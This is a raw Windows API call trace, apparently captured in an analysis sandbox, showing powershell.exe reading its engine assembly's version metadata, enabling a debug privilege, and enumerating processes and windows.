	[0843.594] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed910 | out: lpFileInformation=0x1ed910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0843.596] SetErrorMode (uMode=0x1) returned 0x1
	[0843.599] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1edb80 | out: lpdwHandle=0x1edb80) returned 0x94c
	[0843.603] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce72d8 | out: lpData=0x2ce72d8) returned 1
	[0843.606] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edaf8, puLen=0x1edaf0 | out: lplpBuffer=0x1edaf8*=0x2ce7374, puLen=0x1edaf0) returned 1
	[0843.608] lstrlenW (lpString="䅁") returned 1
	[0843.619] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce7450, puLen=0x1eda60) returned 1
	[0843.620] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0843.622] CoTaskMemAlloc (cb=0x2e) returned 0x3da030
	[0843.623] lstrcpyW (in: lpString1=0x3da030, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0843.624] CoTaskMemFree (pv=0x3da030) 
	[0843.624] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce74a4, puLen=0x1eda60) returned 1
	[0843.624] lstrlenW (lpString="System.Management.Automation") returned 28
	[0843.624] CoTaskMemAlloc (cb=0x3c) returned 0x35ebd0
	[0843.624] lstrcpyW (in: lpString1=0x35ebd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0843.624] CoTaskMemFree (pv=0x35ebd0) 
	[0843.624] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce7500, puLen=0x1eda60) returned 1
	[0843.624] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0843.624] CoTaskMemAlloc (cb=0x20) returned 0x3db120
	[0843.624] lstrcpyW (in: lpString1=0x3db120, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0843.624] CoTaskMemFree (pv=0x3db120) 
	[0843.624] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce7540, puLen=0x1eda60) returned 1
	[0843.624] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0843.624] CoTaskMemAlloc (cb=0x44) returned 0x35ebd0
	[0843.624] lstrcpyW (in: lpString1=0x35ebd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0843.625] CoTaskMemFree (pv=0x35ebd0) 
	[0843.625] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce75a8, puLen=0x1eda60) returned 1
	[0843.625] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0843.625] CoTaskMemAlloc (cb=0x76) returned 0x36ef40
	[0843.625] lstrcpyW (in: lpString1=0x36ef40, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0843.625] CoTaskMemFree (pv=0x36ef40) 
	[0843.625] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce7644, puLen=0x1eda60) returned 1
	[0843.625] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0843.625] CoTaskMemAlloc (cb=0x44) returned 0x35ebd0
	[0843.625] lstrcpyW (in: lpString1=0x35ebd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0843.625] CoTaskMemFree (pv=0x35ebd0) 
	[0843.625] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce76a8, puLen=0x1eda60) returned 1
	[0843.625] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0843.625] CoTaskMemAlloc (cb=0x58) returned 0x32ce60
	[0843.625] lstrcpyW (in: lpString1=0x32ce60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0843.625] CoTaskMemFree (pv=0x32ce60) 
	[0843.625] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce7724, puLen=0x1eda60) returned 1
	[0843.625] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0843.625] CoTaskMemAlloc (cb=0x20) returned 0x3db120
	[0843.626] lstrcpyW (in: lpString1=0x3db120, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0843.626] CoTaskMemFree (pv=0x3db120) 
	[0843.626] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x2ce73cc, puLen=0x1eda60) returned 1
	[0843.626] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0843.626] CoTaskMemAlloc (cb=0x66) returned 0x3cfaf0
	[0843.626] lstrcpyW (in: lpString1=0x3cfaf0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0843.626] CoTaskMemFree (pv=0x3cfaf0) 
	[0843.626] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x0, puLen=0x1eda60) returned 0
	[0843.626] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x0, puLen=0x1eda60) returned 0
	[0843.626] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1eda68, puLen=0x1eda60 | out: lplpBuffer=0x1eda68*=0x0, puLen=0x1eda60) returned 0
	[0843.626] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1eda38, puLen=0x1eda30 | out: lplpBuffer=0x1eda38*=0x2ce7374, puLen=0x1eda30) returned 1
	[0843.627] CoTaskMemAlloc (cb=0x204) returned 0x377850
	[0843.627] VerLanguageNameW (in: wLang=0x0, szLang=0x377850, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0843.629] CoTaskMemFree (pv=0x377850) 
	[0843.629] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\", lplpBuffer=0x1eda88, puLen=0x1eda80 | out: lplpBuffer=0x1eda88*=0x2ce7300, puLen=0x1eda80) returned 1
	[0844.607] GetCurrentProcessId () returned 0x12c4
	[0844.624] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ec9b0 | out: lpLuid=0x1ec9b0*(LowPart=0x14, HighPart=0)) returned 1
	[0844.627] GetCurrentProcess () returned 0xffffffffffffffff
	[0844.628] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ec9d0 | out: TokenHandle=0x1ec9d0*=0x2d4) returned 1
	[0844.629] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2ceab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0844.631] CloseHandle (hObject=0x2d4) returned 1
	[0844.638] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12c4) returned 0x2d4
	[0845.709] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2ceabb8, cb=0x200, lpcbNeeded=0x1ed9e8 | out: lphModule=0x2ceabb8, lpcbNeeded=0x1ed9e8) returned 1
	[0845.712] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2ceae28, cb=0x18 | out: lpmodinfo=0x2ceae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0845.713] CoTaskMemAlloc (cb=0x804) returned 0x3dc410
	[0845.713] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x3dc410, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0845.713] CoTaskMemFree (pv=0x3dc410) 
	[0845.714] CoTaskMemAlloc (cb=0x804) returned 0x3dc410
	[0845.714] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x3dc410, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0845.714] CoTaskMemFree (pv=0x3dc410) 
	[0845.715] CloseHandle (hObject=0x2d4) returned 1
	[0845.723] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x12c4) returned 0x2d4
	[0845.732] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x1edb18 | out: lpExitCode=0x1edb18*=0x103) returned 1
	[0845.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb088, Length=0x20000, ResultLength=0x1edae0 | out: SystemInformation=0x12ceb088, ResultLength=0x1edae0*=0x45800) returned 0xc0000004
	[0846.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d0b0b8, Length=0x48000, ResultLength=0x1edae0 | out: SystemInformation=0x12d0b0b8, ResultLength=0x1edae0*=0x458a0) returned 0x0
	[0847.076] EnumWindows (lpEnumFunc=0x2a866ac, lParam=0x0) returned 1
	[0849.956] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.956] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x558
	[0849.956] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.956] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.956] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x538
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x778
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x778
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.957] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x460
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.958] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x23a8
	[0849.959] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1f24
	[0849.959] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x21ec
	[0849.959] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x2320
	[0849.959] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1fd4
	[0849.959] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1880
	[0849.959] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b18
	[0849.962] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1d6c
	[0849.962] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x233c
	[0849.962] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x2368
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x2124
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x22f0
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x22ac
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1cdc
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x10f0
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1f18
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x20a8
	[0849.963] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x2004
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1f88
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1f84
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x2050
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1e04
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1ecc
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1e64
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b58
	[0849.964] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1e94
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1e28
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1df8
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1da8
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1c70
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x163c
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1a10
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x186c
	[0849.965] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1d74
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4c8
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1960
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1ce4
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b24
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x14e0
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x17f0
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x854
	[0849.966] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1268
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1624
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b9c
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x16f4
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x145c
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x17d0
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1d28
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xcb8
	[0849.967] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1190
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x3a8
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1bd0
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1bfc
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1a78
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b90
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b04
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b34
	[0849.968] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1b64
	[0849.969] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1bb0
	[0849.969] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1acc
	[0849.969] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1a2c
	[0849.969] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x19a8
	[0849.969] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1944
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x18c8
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x18ac
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x18ec
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1898
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc98
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x153c
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1808
	[0849.970] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x12a4
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1740
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x16c4
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1820
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x16ac
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1858
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1664
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x10b4
	[0849.971] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x10ac
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x10ec
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1068
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x17e0
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x102c
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x17a4
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1050
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1694
	[0849.972] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1770
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1720
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x165c
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1578
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x16c0
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x161c
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1638
	[0849.973] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x15c8
